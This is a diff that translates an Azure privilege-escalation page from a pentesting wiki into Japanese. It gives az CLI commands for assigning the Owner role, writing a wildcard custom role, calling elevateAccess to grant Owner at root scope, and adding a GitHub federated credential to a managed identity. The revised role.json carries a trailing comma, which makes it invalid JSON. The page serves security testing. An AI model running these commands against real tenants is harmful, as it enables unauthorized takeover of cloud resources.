Translated ['src/pentesting-cloud/azure-security/az-privilege-escalation

src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md

@@ -4,7 +4,7 @@
 
 ## Azure IAM
 
-Fore more information check:
+詳細については、次を確認してください:
 
 {{#ref}}
 ../az-services/az-azuread.md
@@ -12,45 +12,40 @@ Fore more information check:
 
 ### Microsoft.Authorization/roleAssignments/write
 
-This permission allows to assign roles to principals over a specific scope, allowing an attacker to escalate privileges by assigning himself a more privileged role:
-
+この権限は、特定のスコープに対してプリンシパルに役割を割り当てることを許可し、攻撃者が自分自身により特権のある役割を割り当てることで権限を昇格させることを可能にします:
 ```bash
 # Example
 az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"
 ```
-
 ### Microsoft.Authorization/roleDefinitions/Write
 
-This permission allows to modify the permissions granted by a role, allowing an attacker to escalate privileges by granting more permissions to a role he has assigned.
-
-Create the file `role.json` with the following **content**:
+この権限は、ロールによって付与された権限を変更することを許可し、攻撃者が自分に割り当てられたロールに対してより多くの権限を付与することで特権を昇格させることを可能にします。
 
+ファイル `role.json` を以下の **内容** で作成します:
 ```json
 {
-  "Name": "<name of the role>",
-  "IsCustom": true,
-  "Description": "Custom role with elevated privileges",
-  "Actions": ["*"],
-  "NotActions": [],
-  "DataActions": ["*"],
-  "NotDataActions": [],
-  "AssignableScopes": ["/subscriptions/<subscription-id>"]
+"roleName": "<name of the role>",
+"Name": "<name of the role>",
+"IsCustom": true,
+"Description": "Custom role with elevated privileges",
+"Actions": ["*"],
+"NotActions": [],
+"DataActions": ["*"],
+"NotDataActions": [],
+"AssignableScopes": ["/subscriptions/<subscription-id>"],
+"id": "/subscriptions/<subscription-id>/providers/Microsoft.Authorization/roleDefinitions/<role-id>",
 }
 ```
-
-Then update the role permissions with the previous definition calling:
-
+その後、前の定義を呼び出してロールの権限を更新します:
 ```bash
 az role definition update --role-definition role.json
 ```
-
 ### Microsoft.Authorization/elevateAccess/action
 
-This permissions allows to elevate privileges and be able to assign permissions to any principal to Azure resources. It's meant to be given to Entra ID Global Administrators so they can also manage permissions over Azure resources.
+この権限は、特権を昇格させ、任意のプリンシパルにAzureリソースへの権限を割り当てることを可能にします。これは、Entra IDのグローバル管理者に与えられることを意図しており、彼らがAzureリソースに対する権限を管理できるようにします。
 
 > [!TIP]
-> I think the user need to be Global Administrator in Entrad ID for the elevate call to work.
-
+> 昇格呼び出しが機能するためには、ユーザーがEntra IDのグローバル管理者である必要があると思います。
 ```bash
 # Call elevate
 az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"
@@ -58,27 +53,22 @@ az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Au
 # Grant a user the Owner role
 az role assignment create --assignee "<obeject-id>" --role "Owner" --scope "/"
 ```
-
 ### Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write
 
-This permission allows to add Federated credentials to managed identities. E.g. give access to Github Actions in a repo to a managed identity. Then, it allows to **access any user defined managed identity**.
-
-Example command to give access to a repo in Github to the a managed identity:
+この権限は、管理されたアイデンティティにフェデレーテッド資格情報を追加することを許可します。例えば、リポジトリ内のGithub Actionsに管理されたアイデンティティへのアクセスを付与します。次に、**ユーザー定義の管理されたアイデンティティにアクセスすることを許可します**。
 
+管理されたアイデンティティにGithubのリポジトリへのアクセスを付与するための例のコマンド:
 ```bash
 # Generic example:
 az rest --method PUT \
-  --uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
-  --headers "Content-Type=application/json" \
-  --body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'
+--uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
+--headers "Content-Type=application/json" \
+--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'
 
 # Example with specific data:
 az rest --method PUT \
-  --uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
-  --headers "Content-Type=application/json" \
-  --body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'
+--uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
+--headers "Content-Type=application/json" \
+--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-